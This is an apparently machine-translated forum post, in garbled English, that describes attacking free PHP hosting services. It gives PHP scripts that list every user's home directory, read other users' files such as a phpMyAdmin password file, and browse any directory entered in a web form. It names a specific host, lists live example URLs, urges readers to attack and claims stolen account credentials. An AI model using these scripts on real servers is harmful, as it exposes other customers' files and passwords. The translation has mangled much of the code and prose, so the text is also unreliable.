PHP collects fees small leak of the space

Most (can carry out PHP) collect fees the space has this problem
It is with Hu Yi below exemple:
Code:
< ?
$d=dir("/home");Echo "Handle:" . $d->handle. "≪br>n";Echo "Path:" . $d->path. "≪br>n";While($entry=$d->read() )
{Echo $entry. "≪br>n";
}
$d->close();
? >

Use this Test.php program to be able to be examined / all files below Home, can examine all user of the current leader of 51.net
What to change "/home" into "/" to you can see? Yourself goes looking. Fasten too nervous. It is nervous from the back
Below HOME is to land an account completely
HOME/.domain and
HOME/.trialdomain
Those who fall is 3 grade domain name completely
There is a lot of to do not have a space in the account, it is spacing. I tried repeatedly.
3 grade domain name is corresponding · A fictitious lead plane
Example (dare not use Hu Yi)Http://tonylong.l1h.net/test.phpHttp://tonylong.l1h.net/test1.phpHttp://tonylong.l1h.net/test2.phpHttp://tonylong.l1h.net/test3.php

Read with Aa.php take a file to be piled up formerly
Read take. .
< ?
$fd=fopen("/home/* . *" , "R");While($buffer=fgets($fd, 4096) )
{Echo $buffer;
}Fclose($fd);
? >
Example is read take: / the former code of Home/html/phpmyadmin/user_password.php (this is very big to website menace) Http://tonylong.l1h.net/aa.php
With Ss.php inquiry appoints all files below file directory and folder
< ? Function Listdir($dir){Echo "<ul>";
$handle=opendir($dir);Echo "directory Handle:$Handle<br>n";While ($sdir=readdir($handle)){If(is_file("$dir/$sdir") )Echo "<li>$dir/$sdir";If(is_dir("$dir/$sdir") And $sdir<>' . ' And $sdir<>' . . '){Echo "<li>$dir";Listdir("$dir/$sdir");
}
}Closedir($handle);Echo "</ul>";
}
If(! Empty($dir)){Listdir($dir);
}
? >

<form Action="test.php" Method=post>
Input inquiry method please: <input Type=text Name=dir Size=50>
Inquiry of <input Type=submit Value=" ">
</form>
Example Http://tonylong.l1h.net/ss.php

Show the free space that the space is L1h.net in order to perform
Everybody fastens attack

Still have the one cycle that Perlhack makes up.
Anyway the tiger ala account that myself found me and password.